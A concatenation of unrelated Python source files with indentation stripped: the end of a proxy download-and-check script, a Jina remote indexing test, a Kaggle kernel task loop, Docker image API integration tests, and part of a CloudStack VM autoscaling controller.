choice = input("\nDo you want to check the proxies? [Y/n] > ")
if choice == 'Y' or choice == 'y' or choice == 'yes' or choice == 'Yes':
proxycheckerinit()
break
if choice == 'N' or choice == 'n' or choice == 'no' or choice == 'No':
exit(0)
else:
print ("Please write correctly.")
except:
print ("\n\nAn error occurred.")
if __name__ == '__main__':
while True:
choice = input("\nDo you want to download proxies? [Y/n] > ")
if choice == 'Y' or choice == 'y' or choice == 'yes' or choice == 'Yes': # se si vuole scaricare i proxy va in main()
main()
break
if choice == 'N' or choice == 'n' or choice == 'no' or choice == 'No': # altrimenti checka solo i proxy
proxycheckerinit()
break
else: # se scrivi male richiede l'input
print ("Please write correctly.")
|
test_index_remote.py
|
import multiprocessing as mp
import os
import time
import unittest
import numpy as np
from jina.drivers.helper import array2pb
from jina.enums import FlowOptimizeLevel
from jina.executors.indexers.vector.numpy import NumpyIndexer
from jina.flow import Flow
from jina.main.parser import set_gateway_parser
from jina.peapods.pod import GatewayPod
from jina.proto import jina_pb2
from tests import JinaTestCase
def random_docs(num_docs, chunks_per_doc=5, embed_dim=10):
c_id = 0
for j in range(num_docs):
d = jina_pb2.Document()
for k in range(chunks_per_doc):
c = d.chunks.add()
c.embedding.CopyFrom(array2pb(np.random.random([embed_dim])))
c.chunk_id = c_id
c.doc_id = j
c_id += 1
yield d
def get_result(resp):
n = []
for d in resp.search.docs:
for c in d.chunks:
n.append([k.match_chunk.chunk_id for k in c.topk_results])
n = np.array(n)
# each chunk should return a list of top-100
np.testing.assert_equal(n.shape[0], 5)
np.testing.assert_equal(n.shape[1], 100)
class DummyIndexer(NumpyIndexer):
# the add() function is simply copied from NumpyIndexer
def add(self, *args, **kwargs):
pass
class DummyIndexer2(NumpyIndexer):
# the add() function is simply copied from NumpyIndexer
def add(self, keys: 'np.ndarray', vectors: 'np.ndarray', *args, **kwargs):
if len(vectors.shape) != 2:
raise ValueError('vectors shape %s is not valid, expecting "vectors" to have rank of 2' % vectors.shape)
if not self.num_dim:
self.num_dim = vectors.shape[1]
self.dtype = vectors.dtype.name
elif self.num_dim != vectors.shape[1]:
raise ValueError(
"vectors' shape [%d, %d] does not match with indexers's dim: %d" %
(vectors.shape[0], vectors.shape[1], self.num_dim))
elif self.dtype != vectors.dtype.name:
raise TypeError(
"vectors' dtype %s does not match with indexers's dtype: %s" %
(vectors.dtype.name, self.dtype))
elif keys.shape[0] != vectors.shape[0]:
raise ValueError('number of key %d not equal to number of vectors %d' % (keys.shape[0], vectors.shape[0]))
elif self.key_dtype != keys.dtype.name:
raise TypeError(
"keys' dtype %s does not match with indexers keys's dtype: %s" %
(keys.dtype.name, self.key_dtype))
self.write_handler.write(vectors.tobytes())
self.key_bytes += keys.tobytes()
self.key_dtype = keys.dtype.name
self._size += keys.shape[0]
@unittest.skipIf('GITHUB_WORKFLOW' in os.environ, 'skip the network test on github workflow')
class MyTestCase(JinaTestCase):
def tearDown(self) -> None:
super().tearDown()
time.sleep(2)
def test_index_remote(self):
f_args = set_gateway_parser().parse_args(['--allow-spawn'])
def start_gateway():
with GatewayPod(f_args):
time.sleep(20)
t = mp.Process(target=start_gateway)
t.daemon = True
t.start()
f = Flow().add(yaml_path='yaml/test-index.yml',
replicas=3, separated_workspace=True,
host='localhost', port_grpc=f_args.port_grpc)
with f:
f.index(raw_bytes=random_docs(1000), in_proto=True)
time.sleep(3)
for j in range(3):
self.assertTrue(os.path.exists(f'test2-{j + 1}/test2.bin'))
self.assertTrue(os.path.exists(f'test2-{j + 1}/tmp2'))
self.add_tmpfile(f'test2-{j + 1}/test2.bin', f'test2-{j + 1}/tmp2', f'test2-{j + 1}')
def test_index_remote_rpi(self):
f_args = set_gateway_parser().parse_args(['--allow-spawn'])
def start_gateway():
with GatewayPod(f_args):
time.sleep(50)
t = mp.Process(target=start_gateway)
t.daemon = True
t.start()
f = (Flow(optimize_level=FlowOptimizeLevel.IGNORE_GATEWAY)
.add(yaml_path='yaml/test-index.yml',
replicas=3, separated_workspace=True,
host='192.168.31.76', port_grpc=44444))
with f:
f.index(raw_bytes=random_docs(1000), in_proto=True)
if __name__ == '__main__':
unittest.main()
|
loop.py
|
import time
from musket_core.kaggle_train_runner.kernel import Project, Kernel, KERNEL_STATUS_UNKNOWN, KERNEL_STATUS_CANCELED, KERNEL_STATUS_COMPLETE, KERNEL_STATUS_ERROR, KERNEL_STATUS_NOINTERNET, KERNEL_STATUS_RUNNING
from musket_core.kaggle_train_runner import connection
import threading
from async_promises import Promise
class Task:
def __init__(self, task, sleep=None, on_complete=None):
self.task = task
self.on_complete = on_complete
self.time_to_run = time.time() + sleep
def run(self):
def rejection(cause):
print(cause)
Promise(lambda resolve, reject: resolve(self.task() or True)).then(lambda success: self.on_complete() or True if self.on_complete else True, rejection)
def kernel_status_request_task(kernel: Kernel, on_complete, wait=300, after_run=False):
status = [KERNEL_STATUS_NOINTERNET]
def complete():
on_complete(kernel, status[0])
print("kernel_status_request_task complete")
def task():
while True:
status[0] = kernel.get_status(after_run)
if status[0] != KERNEL_STATUS_NOINTERNET:
break
else:
print(status[0])
time.sleep(1)
print("shedule kernel_status_request_task...")
return Task(task, wait, complete)
def kernel_run_request_task(kernel: Kernel, on_complete, wait=300):
def task():
result = kernel.push()
if len(result) > 0:
print(result);
if("Maximum batch GPU session count") in result:
print("retry will be started after " + str(wait) + " seconds")
time.sleep(wait)
task()
print("shedule kernel_run_request_task...")
def complete(k):
on_complete(k)
print("kernel_run_request_task complete")
return Task(task, wait, lambda: complete(kernel))
class MainLoop:
def __init__(self, project: Project):
self.project = project
self.queue = []
self.running = 0
self.wait = self.project.meta["requests_delay"]
self.kernels_queue = None
def add_task(self, task):
self.queue.insert(0, task)
def run_server(self):
def do_run_server():
connection.run_server(self.project)
threading.Thread(target=do_run_server).start()
def shutdown(self):
self.project.server.shutdown()
self.project.server.server_close()
for item in self.project.kernels:
item.assemble()
def start(self):
self.run_server()
self.kernels_queue = list(self.project.kernels)
self.add_kernels()
while True:
if len(self.queue) > 0:
task = self.queue.pop()
if time.time() > task.time_to_run:
task.run()
else:
self.add_task(task)
elif self.running == 0:
self.shutdown()
break
time.sleep(1)
def add_kernels(self):
while len(self.kernels_queue) and self.running < self.project.meta["kernels"]:
self.running += 1
self.add_task(kernel_status_request_task(self.kernels_queue.pop(), self.on_kernel_status, 10));
def run_kernel(self, kernel, wait_after_run, wait_after_status, is_initial):
kernel.archive(is_initial)
self.add_task(kernel_run_request_task(kernel, lambda k: self.add_task(kernel_status_request_task(k, self.on_kernel_status, wait_after_status)), wait_after_run))
def on_kernel_status(self, kernel, status):
print("status: " + status)
if status == KERNEL_STATUS_UNKNOWN:
self.run_kernel(kernel, 10, 20, True)
return
if status == KERNEL_STATUS_COMPLETE or status == KERNEL_STATUS_ERROR:
kernel.download()
if kernel.is_complete():
self.running -= 1
self.add_kernels()
else:
self.run_kernel(kernel, self.wait, self.wait, False)
return
if status == KERNEL_STATUS_RUNNING:
self.add_task(kernel_status_request_task(kernel, self.on_kernel_status))
return
|
api_image_test.py
|
import contextlib
import json
import shutil
import socket
import tarfile
import tempfile
import threading
import pytest
from http.server import SimpleHTTPRequestHandler
import socketserver
import docker
from ..helpers import requires_api_version, requires_experimental
from .base import BaseAPIIntegrationTest, TEST_IMG
class ListImagesTest(BaseAPIIntegrationTest):
def test_images(self):
res1 = self.client.images(all=True)
assert 'Id' in res1[0]
res10 = res1[0]
assert 'Created' in res10
assert 'RepoTags' in res10
distinct = []
for img in res1:
if img['Id'] not in distinct:
distinct.append(img['Id'])
assert len(distinct) == self.client.info()['Images']
def test_images_quiet(self):
res1 = self.client.images(quiet=True)
assert type(res1[0]) == str
class PullImageTest(BaseAPIIntegrationTest):
def test_pull(self):
try:
self.client.remove_image('hello-world')
except docker.errors.APIError:
pass
res = self.client.pull('hello-world')
self.tmp_imgs.append('hello-world')
assert type(res) == str
assert len(self.client.images('hello-world')) >= 1
img_info = self.client.inspect_image('hello-world')
assert 'Id' in img_info
def test_pull_streaming(self):
try:
self.client.remove_image('hello-world')
except docker.errors.APIError:
pass
stream = self.client.pull(
'hello-world', stream=True, decode=True)
self.tmp_imgs.append('hello-world')
for chunk in stream:
assert isinstance(chunk, dict)
assert len(self.client.images('hello-world')) >= 1
img_info = self.client.inspect_image('hello-world')
assert 'Id' in img_info
@requires_api_version('1.32')
@requires_experimental(until=None)
def test_pull_invalid_platform(self):
with pytest.raises(docker.errors.APIError) as excinfo:
self.client.pull('hello-world', platform='foobar')
# Some API versions incorrectly returns 500 status; assert 4xx or 5xx
assert excinfo.value.is_error()
assert 'unknown operating system' in excinfo.exconly() \
or 'invalid platform' in excinfo.exconly()
class CommitTest(BaseAPIIntegrationTest):
def test_commit(self):
container = self.client.create_container(TEST_IMG, ['touch', '/test'])
id = container['Id']
self.client.start(id)
self.tmp_containers.append(id)
res = self.client.commit(id)
assert 'Id' in res
img_id = res['Id']
self.tmp_imgs.append(img_id)
img = self.client.inspect_image(img_id)
assert 'Container' in img
assert img['Container'].startswith(id)
assert 'ContainerConfig' in img
assert 'Image' in img['ContainerConfig']
assert TEST_IMG == img['ContainerConfig']['Image']
busybox_id = self.client.inspect_image(TEST_IMG)['Id']
assert 'Parent' in img
assert img['Parent'] == busybox_id
def test_commit_with_changes(self):
cid = self.client.create_container(TEST_IMG, ['touch', '/test'])
self.tmp_containers.append(cid)
self.client.start(cid)
img_id = self.client.commit(
cid, changes=['EXPOSE 8000', 'CMD ["bash"]']
)
self.tmp_imgs.append(img_id)
img = self.client.inspect_image(img_id)
assert 'Container' in img
assert img['Container'].startswith(cid['Id'])
assert '8000/tcp' in img['Config']['ExposedPorts']
assert img['Config']['Cmd'] == ['bash']
class RemoveImageTest(BaseAPIIntegrationTest):
def test_remove(self):
container = self.client.create_container(TEST_IMG, ['touch', '/test'])
id = container['Id']
self.client.start(id)
self.tmp_containers.append(id)
res = self.client.commit(id)
assert 'Id' in res
img_id = res['Id']
self.tmp_imgs.append(img_id)
logs = self.client.remove_image(img_id, force=True)
assert {"Deleted": img_id} in logs
images = self.client.images(all=True)
res = [x for x in images if x['Id'].startswith(img_id)]
assert len(res) == 0
class ImportImageTest(BaseAPIIntegrationTest):
'''Base class for `docker import` test cases.'''
TAR_SIZE = 512 * 1024
def write_dummy_tar_content(self, n_bytes, tar_fd):
def extend_file(f, n_bytes):
f.seek(n_bytes - 1)
f.write(bytearray([65]))
f.seek(0)
tar = tarfile.TarFile(fileobj=tar_fd, mode='w')
with tempfile.NamedTemporaryFile() as f:
extend_file(f, n_bytes)
tarinfo = tar.gettarinfo(name=f.name, arcname='testdata')
tar.addfile(tarinfo, fileobj=f)
tar.close()
@contextlib.contextmanager
def dummy_tar_stream(self, n_bytes):
'''Yields a stream that is valid tar data of size n_bytes.'''
with tempfile.NamedTemporaryFile() as tar_file:
self.write_dummy_tar_content(n_bytes, tar_file)
tar_file.seek(0)
yield tar_file
@contextlib.contextmanager
def dummy_tar_file(self, n_bytes):
'''Yields the name of a valid tar file of size n_bytes.'''
with tempfile.NamedTemporaryFile(delete=False) as tar_file:
self.write_dummy_tar_content(n_bytes, tar_file)
tar_file.seek(0)
yield tar_file.name
def test_import_from_bytes(self):
with self.dummy_tar_stream(n_bytes=500) as f:
content = f.read()
# The generic import_image() function cannot import in-memory bytes
# data that happens to be represented as a string type, because
# import_image() will try to use it as a filename and usually then
# trigger an exception. So we test the import_image_from_data()
# function instead.
statuses = self.client.import_image_from_data(
content, repository='test/import-from-bytes')
result_text = statuses.splitlines()[-1]
result = json.loads(result_text)
assert 'error' not in result
img_id = result['status']
self.tmp_imgs.append(img_id)
def test_import_from_file(self):
with self.dummy_tar_file(n_bytes=self.TAR_SIZE) as tar_filename:
# statuses = self.client.import_image(
# src=tar_filename, repository='test/import-from-file')
statuses = self.client.import_image_from_file(
tar_filename, repository='test/import-from-file')
result_text = statuses.splitlines()[-1]
result = json.loads(result_text)
assert 'error' not in result
assert 'status' in result
img_id = result['status']
self.tmp_imgs.append(img_id)
def test_import_from_stream(self):
with self.dummy_tar_stream(n_bytes=self.TAR_SIZE) as tar_stream:
statuses = self.client.import_image(
src=tar_stream, repository='test/import-from-stream')
# statuses = self.client.import_image_from_stream(
# tar_stream, repository='test/import-from-stream')
result_text = statuses.splitlines()[-1]
result = json.loads(result_text)
assert 'error' not in result
assert 'status' in result
img_id = result['status']
self.tmp_imgs.append(img_id)
def test_import_image_from_data_with_changes(self):
with self.dummy_tar_stream(n_bytes=500) as f:
content = f.read()
statuses = self.client.import_image_from_data(
content, repository='test/import-from-bytes',
changes=['USER foobar', 'CMD ["echo"]']
)
result_text = statuses.splitlines()[-1]
result = json.loads(result_text)
assert 'error' not in result
img_id = result['status']
self.tmp_imgs.append(img_id)
img_data = self.client.inspect_image(img_id)
assert img_data is not None
assert img_data['Config']['Cmd'] == ['echo']
assert img_data['Config']['User'] == 'foobar'
def test_import_image_with_changes(self):
with self.dummy_tar_file(n_bytes=self.TAR_SIZE) as tar_filename:
statuses = self.client.import_image(
src=tar_filename, repository='test/import-from-file',
changes=['USER foobar', 'CMD ["echo"]']
)
result_text = statuses.splitlines()[-1]
result = json.loads(result_text)
assert 'error' not in result
img_id = result['status']
self.tmp_imgs.append(img_id)
img_data = self.client.inspect_image(img_id)
assert img_data is not None
assert img_data['Config']['Cmd'] == ['echo']
assert img_data['Config']['User'] == 'foobar'
# Docs say output is available in 1.23, but this test fails on 1.12.0
@requires_api_version('1.24')
def test_get_load_image(self):
test_img = 'hello-world:latest'
self.client.pull(test_img)
data = self.client.get_image(test_img)
assert data
output = self.client.load_image(data)
assert any([
line for line in output
if f'Loaded image: {test_img}' in line.get('stream', '')
])
@contextlib.contextmanager
def temporary_http_file_server(self, stream):
'''Serve data from an IO stream over HTTP.'''
class Handler(SimpleHTTPRequestHandler):
def do_GET(self):
self.send_response(200)
self.send_header('Content-Type', 'application/x-tar')
self.end_headers()
shutil.copyfileobj(stream, self.wfile)
server = socketserver.TCPServer(('', 0), Handler)
thread = threading.Thread(target=server.serve_forever)
thread.setDaemon(True)
thread.start()
yield f'http://{socket.gethostname()}:{server.server_address[1]}'
server.shutdown()
@pytest.mark.skipif(True, reason="Doesn't work inside a container - FIXME")
def test_import_from_url(self):
# The crappy test HTTP server doesn't handle large files well, so use
# a small file.
tar_size = 10240
with self.dummy_tar_stream(n_bytes=tar_size) as tar_data:
with self.temporary_http_file_server(tar_data) as url:
statuses = self.client.import_image(
src=url, repository='test/import-from-url')
result_text = statuses.splitlines()[-1]
result = json.loads(result_text)
assert 'error' not in result
assert 'status' in result
img_id = result['status']
self.tmp_imgs.append(img_id)
@requires_api_version('1.25')
class PruneImagesTest(BaseAPIIntegrationTest):
def test_prune_images(self):
try:
self.client.remove_image('hello-world')
except docker.errors.APIError:
pass
# Ensure busybox does not get pruned
ctnr = self.client.create_container(TEST_IMG, ['sleep', '9999'])
self.tmp_containers.append(ctnr)
self.client.pull('hello-world', tag='latest')
self.tmp_imgs.append('hello-world')
img_id = self.client.inspect_image('hello-world')['Id']
result = self.client.prune_images()
assert img_id not in [
img.get('Deleted') for img in result.get('ImagesDeleted') or []
]
result = self.client.prune_images({'dangling': False})
assert result['SpaceReclaimed'] > 0
assert 'hello-world:latest' in [
img.get('Untagged') for img in result['ImagesDeleted']
]
assert img_id in [
img.get('Deleted') for img in result['ImagesDeleted']
]
class SaveLoadImagesTest(BaseAPIIntegrationTest):
@requires_api_version('1.23')
def test_get_image_load_image(self):
with tempfile.TemporaryFile() as f:
stream = self.client.get_image(TEST_IMG)
for chunk in stream:
f.write(chunk)
f.seek(0)
result = self.client.load_image(f.read())
success = False
result_line = f'Loaded image: {TEST_IMG}\n'
for data in result:
print(data)
if 'stream' in data:
if data['stream'] == result_line:
success = True
break
assert success is True
@requires_api_version('1.30')
class InspectDistributionTest(BaseAPIIntegrationTest):
def test_inspect_distribution(self):
data = self.client.inspect_distribution('busybox:latest')
assert data is not None
assert 'Platforms' in data
assert {'os': 'linux', 'architecture': 'amd64'} in data['Platforms']
|
controller.py
|
#! /usr/bin/env python3
import os
import re
import time
import json
import logging
import pickle
import threading
import requests
from argparse import ArgumentParser
from configparser import ConfigParser
from pathlib import Path
from tempfile import NamedTemporaryFile
from cs import read_config, CloudStack
import catalog
#
CONFIG_FILE = "/auto-scaling/cloudstack.ini"
STATUS_FILE = "/auto-scaling/autoscaling.status"
INTERVAL = 15 # 15 sec
PERIOD = 180 # 180 sec
USAGE_COUNT = PERIOD / INTERVAL
VM_PREFIX = "asvm"
AGENT_PORT = 8585
#
logger = None
#
def get_logger():
global logger
if not logger:
handler = logging.StreamHandler()
handler.setFormatter(logging.Formatter('%(message)s'))
logger = logging.getLogger()
logger.addHandler(handler)
logger.setLevel(logging.DEBUG)
return logger
#
def print_debug(text):
print_method = print if not logger else logger.debug
for line in text.split("\n"):
print_method("[DEBUG] {}".format(line))
#
def print_info(text):
print_method = print if not logger else logger.info
for line in text.split("\n"):
print_method(line)
#
class CloudStackApiClient:
_MAX_RETRY = 180
_ASYNC_INTERVAL = 5
_INSTANCE = None
@classmethod
def get_instance(cls, zoneid, debug=False):
if cls._INSTANCE is None or ( cls._INSTANCE and cls._INSTANCE.zoneid != zoneid ):
cls._INSTANCE = cls(zoneid, debug)
return cls._INSTANCE
def __init__(self, zoneid, debug):
self.zoneid = zoneid
self._debug = debug
self._config = read_config()
self._cs = CloudStack(**self._config)
self._vms = {}
self._zones = {}
self._lbs = {}
self._templates = {}
self._offerings = {}
self._networks = {}
def _print_debug(self, text):
if self._debug:
print_debug(text)
def _dump(self, data=None):
if self._debug and data:
print_debug(json.dumps(data, sort_keys=True, indent=2))
def queryAsyncJobResult(self, jobid):
for i in range(0, self._MAX_RETRY):
job = self._cs.queryAsyncJobResult(jobid=jobid)
if job['jobstatus'] == 1:
self._dump(job)
return job
self._print_debug("wait for job: {} times".format(i + 1))
time.sleep(self._ASYNC_INTERVAL)
return None
def _list(self, api_name, params):
results = getattr(self._cs, api_name)(**params)
self._dump(results)
section = re.sub('^list(.+)s$', lambda m: m.group(1), api_name).lower()
if section in results:
return results[section]
else:
return []
def listZones(self):
return self._list("listZones", { "zoneid": self.zoneid })
def listLoadBalancerRules(self):
return self._list("listLoadBalancerRules", { "zoneid": self.zoneid })
def listNetworks(self):
return self._list("listNetworks", { "zoneid": self.zoneid })
def listTemplates(self):
return self._list("listTemplates", { "zoneid": self.zoneid, "templatefilter": "self" })
def listServiceOfferings(self):
return self._list("listServiceOfferings", {})
def listVirtualMachines(self):
return self._list("listVirtualMachines", { "zoneid": self.zoneid })
def deployVirtualMachine(self, name, templateid, offeringid, networkids):
result = self._cs.deployVirtualMachine(
zoneid=self.zoneid,
serviceofferingid=offeringid,
templateid=templateid,
networkids=",".join(networkids),
name=name,
displayname=name
)
job = self.queryAsyncJobResult(result['jobid'])
if job is None or "jobresult" not in job or "virtualmachine" not in job["jobresult"]:
return None
uuid = job['jobresult']['virtualmachine']['id']
self._vms[uuid] = { 'uuid': uuid, 'name': name }
return self._vms[uuid]
def destroyVirtualMachine(self, vmid):
result = self._cs.destroyVirtualMachine(id=vmid, expunge=True)
self.queryAsyncJobResult(result['jobid'])
def assignToLoadBalancerRule(self, lbid, vmid):
result = self._cs.assignToLoadBalancerRule(id=lbid, virtualmachineids=vmid)
self.queryAsyncJobResult(result['jobid'])
def removeFromLoadBalancerRule(self, lbid, vmid):
result = self._cs.removeFromLoadBalancerRule(id=lbid, virtualmachineids=vmid)
self.queryAsyncJobResult(result['jobid'])
def _get_data(self, uuid, cache, method, params, force=False):
if uuid not in cache or force:
cache = {}
for x in getattr(self, method)():
cache[x['id']] = { p[0]:x[p[1]] for p in params }
if uuid in cache:
return cache[uuid]
return None
def get_vm_data(self, uuid, force=False):
return self._get_data(
uuid=uuid, cache=self._vms, method="listVirtualMachines",
params=(('name', 'name'), ('uuid', 'id')),
force=force
)
def get_zone_data(self, uuid, force=False):
return self._get_data(
uuid=uuid, cache=self._zones, method="listZones",
params=(('name', 'name'), ('uuid', 'id')),
force=force
)
def get_lb_data(self, uuid, force=False):
return self._get_data(
uuid=uuid, cache=self._lbs, method="listLoadBalancerRules",
params=(('name', 'name'), ('uuid', 'id')),
force=force
)
def get_network_data(self, uuid, force=False):
return self._get_data(
uuid=uuid, cache=self._networks, method="listNetworks",
params=(('name', 'name'), ('uuid', 'id')),
force=force
)
def get_template_data(self, uuid, force=False):
return self._get_data(
uuid=uuid, cache=self._templates, method="listTemplates",
params=(('name', 'name'), ('uuid', 'id')),
force=force
)
def get_offering_data(self, uuid, force=False):
return self._get_data(
uuid=uuid, cache=self._offerings, method="listServiceOfferings",
params=(('name', 'name'), ('uuid', 'id')),
force=force
)
def create_vm(self, name, lbid, templateid, offeringid, networkids):
vm = self.deployVirtualMachine(name, templateid, offeringid, networkids)
if vm:
self.assignToLoadBalancerRule(lbid, vm['uuid'])
return vm
def remove_vm(self, vmid, lbid):
self.removeFromLoadBalancerRule(lbid, vmid)
self.destroyVirtualMachine(vmid)
#
class AutoScalingUsageCollector(threading.Thread):
_TIMEOUT = 2
def __init__(self, name, endpoint, info, usage, interval=INTERVAL, usage_count=USAGE_COUNT):
super().__init__(name=name)
self._event = threading.Event()
self._endpoint = endpoint
self._info = info
self._interval = interval
self._usage = usage
self._usage_count = usage_count
@property
def event(self):
return self._event
@property
def usage(self):
return self._usage
@property
def active(self):
return self._info['active']
@property
def failcount(self):
return self._info['failcount']
def run(self):
interval = 0
while not self._event.wait(timeout=interval):
begin_time = time.time()
usage = None
try:
result = requests.get(self._endpoint, timeout=self._TIMEOUT)
usage = round(result.json()['usage'], 1)
self._info['active'] = True
self._info['failcount'] = 0
except:
self._info['failcount'] += 1
if self._usage_count <= self._info['failcount']:
self._info['active'] = False
self._usage.append([time.strftime('%H:%M:%S', time.gmtime(begin_time)), usage])
if len(self._usage) > self._usage_count:
self._usage.pop(0)
interval = self._interval - ( time.time() - begin_time )
if interval < 0:
interval = 0
#
class AutoScalingData:
def __init__(self, file, debug=False):
self._file = file
self._debug = debug
self.data = None
def _print_debug(self, text):
if self._debug:
print_debug(text)
def dump(self, data=None):
if data is None:
data = self.data
if self._debug and data:
print_debug(json.dumps(data, sort_keys=True, indent=2))
#
class AutoScalingConfig(AutoScalingData):
# 0:Section, 1:OptionName, (2-0:Type, 2-1:Required, 2-2:Judge)
_SCHEMA = {
'cloudstack' : {
'endpoint' : (str, True, None),
'key' : (str, True, None),
'secret' : (str, True, None),
},
'tenant' : dict(**{
'zone_uuid' : (str, True, '_judge_zone'),
'lb_rule_uuid' : (str, True, '_judge_lb'),
'template_uuid' : (str, True, '_judge_template'),
'serviceoffering_uuid': (str, True, '_judge_offering'),
'network1_uuid' : (str, True, '_judge_network'),
}, **{ f'network{i}_uuid' : (str, False, '_judge_network') for i in range(2, 10) }),
'vm' : {
'vm1_uuid' : (str, True, None),
},
'autoscaling': {
'autoscaling_vm' : (int, True, None),
'upper_limit' : (float, True, None),
'lower_limit' : (float, True, None),
},
}
def __init__(self, file, debug=False):
super().__init__(file, debug)
self._mtime = 0
self._client = None
self._ready = False
def _judge_zone(self, uuid):
return self._client.get_zone_data(uuid) is not None
def _judge_lb(self, uuid):
return self._client.get_lb_data(uuid) is not None
def _judge_network(self, uuid):
return self._client.get_network_data(uuid) is not None
def _judge_template(self, uuid):
return self._client.get_template_data(uuid) is not None
def _judge_offering(self, uuid):
return self._client.get_offering_data(uuid) is not None
def _judge(self):
if self.data is None:
self._print_debug("{} is empty".format(self._file))
return False
for section, params in self._SCHEMA.items():
if section not in self.data:
self._print_debug("Section {} is required".format(section))
return False
for name, options in params.items():
if options[1]:
if name not in self.data[section]:
self._print_debug("Option {} => {} is required".format(section, name))
return False
self._client = CloudStackApiClient.get_instance(
zoneid=self.data['tenant']['zone_uuid'],
debug=self._debug
)
for section, params in self._SCHEMA.items():
for name, options in params.items():
if options[2]:
if name not in self.data[section]:
continue
if not getattr(self, options[2])(self.data[section][name]):
self._print_debug("Option {} => {} is incorrect".format(section, name))
return False
return True
def load(self):
if not Path(self._file).is_file():
self._print_debug("{} does not exist".format(self._file))
self._ready = False
return False
current_mtime = os.path.getmtime(self._file)
if current_mtime == self._mtime:
self._print_debug("{} does not need to re-load".format(self._file))
return False
self._print_debug("{} loaded".format(self._file))
conf = ConfigParser()
conf.read(self._file)
f = {
None : lambda c, s, n: c.get(s, n),
str : lambda c, s, n: c.get(s, n),
int : lambda c, s, n: c.getint(s, n),
float: lambda c, s, n: c.getfloat(s, n),
bool : lambda c, s, n: c.getboolean(s, n),
}
self.data = {}
for section in conf.sections():
self.data[section] = {}
for name in conf.options(section):
option_type = None
if section in self._SCHEMA and name in self._SCHEMA[section]:
option_type = self._SCHEMA[section][name][0]
self.data[section][name] = f[option_type](conf, section, name)
self.dump()
self._ready = self._judge()
self._mtime = current_mtime
return True
@property
def ready(self):
return self._ready
@property
def tenant_networks(self):
networks = []
for i in range(1, 10):
name = f'network{i}_uuid'
if name in self.data['tenant']:
networks.append(self.data['tenant'][name])
return networks
#
class AutoScalingStatus(AutoScalingData):
_PICKLE_VERSION = 3
_MAX_RETRY = 120
_RETRY_INTERVAL = 5
def __init__(self, file, debug=False):
super().__init__(file, debug)
self._agents = {}
self._event_save = None
def __del__(self):
for agent in self._agents.values():
agent.event.set()
def _start_collector(self, uuid, name, info, usage, port=AGENT_PORT):
if uuid not in self._agents:
self._agents[uuid] = AutoScalingUsageCollector(
name, "http://{}:{}/".format(name, port), info, usage)
if not self._agents[uuid].is_alive():
self._agents[uuid].start()
def _stop_collector(self, uuid):
if uuid in self._agents:
self._agents.pop(uuid).event.set()
def _wait_collector(self, uuid):
for i in range(0, self._MAX_RETRY):
if self._agents[uuid].active:
return True
time.sleep(self._RETRY_INTERVAL)
return False
def init_status(self):
for uuid in self.data['vm']:
self.data['status'][uuid][:] = []
def remove_vm(self, uuid):
self._stop_collector(uuid)
self.data['vm'].pop(uuid)
self.data['status'].pop(uuid)
def add_vm(self, uuid, name, autoscaling=False, wait=False):
self.data['vm'][uuid] = {
'uuid' : uuid,
'name' : name,
'autoscaling': autoscaling,
'active' : False,
'failcount' : 0
}
self.data['status'][uuid] = []
self._start_collector(uuid, name, self.data['vm'][uuid], self.data['status'][uuid])
if wait:
if not self._wait_collector(uuid):
self.remove_vm(uuid)
return False
return True
def load(self):
self.data = {
'vm' : {},
'status' : {},
'average': 0.0,
'info' : { 'code': 200, 'message': None },
}
if Path(self._file).is_file():
with open(self._file, 'rb') as fd:
data = pickle.load(fd)
if data and 'vm' in data:
for uuid, vm in data['vm'].items():
self.add_vm(vm['uuid'], vm['name'], vm['autoscaling'])
self.dump()
return True
def save(self):
path = Path(self._file)
tmpfile = None
with NamedTemporaryFile(mode='wb', dir=path.parent, prefix=path.name, delete=False) as f:
tmpfile = f.name
pickle.dump(self.data, f, protocol=self._PICKLE_VERSION)
if tmpfile:
os.rename(tmpfile, self._file)
self.dump()
@property
def is_constant_save(self):
return self._event_save is not None
def start_constant_save(self):
def run():
while not self._event_save.wait(timeout=15):
self.save()
self._event_save = None
if not self.is_constant_save:
thread = threading.Thread(target=run)
self._event_save = threading.Event()
thread.start()
def stop_constant_save(self):
if self.is_constant_save:
self._event_save.set()
def set_info(self, code, **kwargs):
c = catalog.CATALOG[code]
self.data['info'] = {
'code': code,
'message': c.format(**kwargs) if c else c
}
#
class AutoScalingController:
def __init__(self, config_file, status_file, prefix=VM_PREFIX, debug=False):
self._debug = debug
self._client = None
self._prefix = prefix
self._config = AutoScalingConfig(config_file, self._debug)
self._status = AutoScalingStatus(status_file, self._debug)
def _print_debug(self, text):
if self._debug:
print_info("[DEBUG] {}".format(text))
def _get_cloudstack(self):
self._client = CloudStackApiClient.get_instance(
zoneid=self._config.data['tenant']['zone_uuid'],
debug=self._debug
)
def _available_vm(self):
return {
uuid: v for uuid, v in self._status.data['vm'].items()
if v is not None and v['active']
}
def _autoscaling_vm(self):
return [
v for uuid, v in self._status.data['vm'].items()
if v is not None and v['autoscaling']
]
def _stable_vm(self):
return [
v for uuid, v in self._status.data['vm'].items()
if v is not None and not v['autoscaling']
]
def load_config(self):
updated = self._config.load()
self._print_debug("ready={}, updated={}".format(self._config.ready, updated))
if not self._config.ready:
if self._status.is_constant_save:
self._status.stop_constant_save()
self._status.set_info(catalog.ERROR_CONFIG)
self.save_status()
return False
if updated:
self._get_cloudstack()
# new stable VM
stables = self._config.data['vm'].values()
for uuid in stables:
if uuid in self._status.data['vm']:
continue
vm = self._get_vm_data(uuid)
if vm:
self._status.add_vm(**vm, autoscaling=False)
# leave stable VM
for vm in self._stable_vm():
if vm['uuid'] not in stables:
self._status.remove_vm(vm['uuid'])
self._status.set_info(catalog.OK)
self._status.start_constant_save()
return True
def load_status(self):
self._status.load()
def save_status(self):
self._status.save()
def create_vm(self):
vms = [ v['name'] for v in self._autoscaling_vm() ]
if self._config.data['autoscaling']['autoscaling_vm'] <= len(vms):
return
for i in range(1, 100):
name = "{}{:02d}".format(self._prefix, i)
if name not in vms:
break
self._status.set_info(catalog.OK_CREATING, name=name)
vm = self._client.create_vm(
name,
self._config.data['tenant']['lb_rule_uuid'],
self._config.data['tenant']['template_uuid'],
self._config.data['tenant']['serviceoffering_uuid'],
self._config.tenant_networks
)
if vm is None:
self._status.set_info(catalog.ERROR_CREATE, name=name)
print_info("Error: Failed to create a new vm: name={}".format(name))
return
uuid = vm['uuid']
if self._status.add_vm(**vm, autoscaling=True, wait=True):
self._status.init_status()
self._status.set_info(catalog.OK_CREATED, name=name)
print_info("Create new vm: name={}, uuid={}".format(name, uuid))
else:
self._client.remove_vm(uuid, self._config.data['tenant']['lb_rule_uuid'])
